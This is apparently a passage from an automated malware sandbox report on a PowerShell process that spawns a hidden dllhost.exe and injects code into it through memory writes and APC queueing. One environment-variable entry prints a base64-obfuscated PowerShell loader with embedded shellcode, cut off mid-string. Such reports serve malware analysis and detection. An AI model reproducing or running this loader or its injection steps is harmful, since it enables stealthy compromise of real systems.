Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ value_name = f, data = 0 False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Windows\syswow64\dllhost.exe os_pid = 0x220, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Thread (2)
+
Operation Process Additional Information Success Count Logfile
Queue APC c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0x174 True 1
Fn
Resume c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0x174 True 1
Fn
Memory (2)
+
Operation Process Additional Information Success Count Logfile
Allocate C:\Windows\syswow64\dllhost.exe address = 0x60000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15108 True 1
Fn
Write C:\Windows\syswow64\dllhost.exe address = 0x60000, size = 15108 True 1
Fn
Data
Module (108)
+
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76f00000 True 1
Fn
Load ntdll.dll base_address = 0x77c60000 True 1
Fn
Load WS2_32.dll base_address = 0x75820000 True 1
Fn
Load SHLWAPI.dll base_address = 0x776e0000 True 1
Fn
Load WININET.dll base_address = 0x77370000 True 1
Fn
Load RPCRT4.dll base_address = 0x76bf0000 True 1
Fn
Load imagehlp.dll base_address = 0x76b00000 True 1
Fn
Load USERENV.dll base_address = 0x75710000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76b50000 True 1
Fn
Load ole32.dll base_address = 0x77210000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76f00000 True 3
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x75ba0000 True 1
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77c60000 True 1
Fn
Get Handle WS2_32.dll base_address = 0x75820000 True 1
Fn
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x776e0000 True 1
Fn
Get Handle WININET.dll base_address = 0x77370000 True 1
Fn
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x76bf0000 True 1
Fn
Get Handle imagehlp.dll base_address = 0x76b00000 True 1
Fn
Get Handle c:\windows\syswow64\userenv.dll base_address = 0x75710000 True 1
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76b50000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x77210000 True 1
Fn
Get Handle c:\windows\syswow64\windowspowershell\v1.0\powershell.exe base_address = 0x21a70000 True 1
Fn
Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\windowspowershell\v1.0\powershell.exe process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76f1435f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CallWindowProcA, address_out = 0x75bc792f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76f11856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76f11245 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76f11222 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x77cad2f3 True 2
Fn
Get Address Unknown module name function = 16, address_out = 0x75826b0e True 2
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7770c45b True 2
Fn
Get Address Unknown module name function = InternetCrackUrlA, address_out = 0x7737d075 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x76c17c12 True 2
Fn
Get Address Unknown module name function = CheckSumMappedFile, address_out = 0x76b08303 True 2
Fn
Get Address c:\windows\syswow64\userenv.dll function = CreateEnvironmentBlock, address_out = 0x75711a7a True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76b6469d True 2
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x7722b636 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x77d354a7 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x77cd5c30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x77c801b4 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueryValueKey, address_out = 0x77c7fa98 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x77c7ff14 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x77c7fb30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x77d298c3 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77d34760 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x77cd9d88 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlImageNtHeader, address_out = 0x77c93164 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x77c9ad68 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x77c8df20 True 1
Fn
Get Address Unknown module name function = 115, address_out = 0x75823ab2 True 1
Fn
Get Address Unknown module name function = 3, address_out = 0x75823918 True 1
Fn
Get Address Unknown module name function = 19, address_out = 0x75826f01 True 1
Fn
Get Address Unknown module name function = 4, address_out = 0x75826bdd True 1
Fn
Get Address Unknown module name function = 52, address_out = 0x75837673 True 1
Fn
Get Address Unknown module name function = 23, address_out = 0x75823eb8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathUnquoteSpacesA, address_out = 0x7770ecc7 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameA, address_out = 0x776f00aa True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrCmpNIA, address_out = 0x776ed11c True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrChrA, address_out = 0x776ec5e6 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x776ed250 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x77cbd598 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76f17a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76f114b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventA, address_out = 0x76f1328c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x76f17a2f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WinExec, address_out = 0x76f92c21 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76f11282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76f153c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempFileNameA, address_out = 0x76f39d3f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathA, address_out = 0x76f3276c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76f110ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76f2d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeThread, address_out = 0x76f2d5b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76f11136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x76f143ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x76f2d9e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x76f2d9b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76f11072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x76f2eb39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76f1110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76f13519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76f11410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76f149d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x76f13e8e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76f111c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76f1186e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76b614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76b646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x76b648ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExA, address_out = 0x76b614b3 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76b61469 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76b64304 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x76f1195e True 1
Fn
System (6)
+
Operation Additional Information Success Count Logfile
Get Info type = Operating System False 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (79)
+
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 71
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\5p5NrGJn0jS HALPmcxz True 1
Fn
Get Environment String name = a True 2
Fn
Get Environment String name = a, result_out = iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr True 2
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Process #7: dllhost.exe
(Host: 151, Network: 7)
+
Information Value
ID #7
File Name c:\windows\syswow64\dllhost.exe
Command Line C:\Windows\syswow64\dllhost.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:31, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:00:41
OS Process Information
+
Information Value
PID 0x220
Parent PID 0x578 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
